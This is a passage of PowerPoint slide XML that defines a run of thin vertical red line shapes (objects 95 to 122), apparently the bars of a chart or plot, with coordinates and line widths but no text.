          </a:custGeom>
          <a:ln w="5606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="object 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2970572" y="4911382"/>
            <a:ext cx="0" cy="1079663"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="544830">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="544260"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8608">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="object 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2990404" y="4336810"/>
            <a:ext cx="0" cy="1650951"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="833119">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="832706"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="object 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2990404" y="4333834"/>
            <a:ext cx="0" cy="1657243"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="836294">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="835708"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8608">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="object 98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3010633" y="4769972"/>
            <a:ext cx="0" cy="1218081"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="614680">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="614119"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="object 99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3010633" y="4766997"/>
            <a:ext cx="0" cy="1223115"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="617219">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="617122"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="object 100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3030467" y="4225743"/>
            <a:ext cx="0" cy="1761688"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="889000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="888753"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="object 101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3030467" y="4222769"/>
            <a:ext cx="0" cy="1767980"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="892175">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="891756"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="object 102"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3050300" y="4819947"/>
            <a:ext cx="0" cy="1167748"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="589280">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="588900"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="object 103"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3050300" y="4816974"/>
            <a:ext cx="0" cy="1174039"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="592455">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="591903"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="object 104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3070134" y="4103570"/>
            <a:ext cx="0" cy="1883746"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="950594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="950406"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="object 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3070134" y="4100594"/>
            <a:ext cx="0" cy="1890038"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="953769">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="953408"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="object 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3089967" y="4853273"/>
            <a:ext cx="0" cy="1133772"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="572135">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="572083"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="object 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3089967" y="4850296"/>
            <a:ext cx="0" cy="1140064"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="575310">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="575086"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="object 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3109801" y="4342363"/>
            <a:ext cx="0" cy="1644660"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="829944">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="829903"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="object 109"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3109801" y="4339388"/>
            <a:ext cx="0" cy="1650951"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="833119">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="832906"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="object 110"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3129635" y="4980996"/>
            <a:ext cx="0" cy="1006679"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="508000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="507631"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="object 111"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3129635" y="4978020"/>
            <a:ext cx="0" cy="1012971"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="511175">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="510633"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="object 112"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3149468" y="4542283"/>
            <a:ext cx="0" cy="1445843"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="729614">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="729018"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="object 113"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3149468" y="4539308"/>
            <a:ext cx="0" cy="1450876"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="732155">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="732020"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="object 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3169302" y="4942124"/>
            <a:ext cx="0" cy="1045688"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="527685">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="527246"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="object 115"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3169302" y="4939149"/>
            <a:ext cx="0" cy="1051979"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="530860">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="530249"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="object 116"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3189134" y="4420109"/>
            <a:ext cx="0" cy="1567902"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="791210">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="790670"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="object 117"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3189134" y="4417134"/>
            <a:ext cx="0" cy="1572936"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="793750">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="793673"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="object 118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3208969" y="4908807"/>
            <a:ext cx="0" cy="1078405"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="544194">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="544060"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="object 119"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3208969" y="4905829"/>
            <a:ext cx="0" cy="1084697"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="547369">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="547062"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="object 120"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3229197" y="4425662"/>
            <a:ext cx="0" cy="1561611"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="788035">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="787868"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="object 121"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3229197" y="4422687"/>
            <a:ext cx="0" cy="1567902"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="791210">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="790870"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="object 122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3249032" y="4992105"/>
            <a:ext cx="0" cy="995352"/>
          </a:xfrm>
          <a:custGeom>
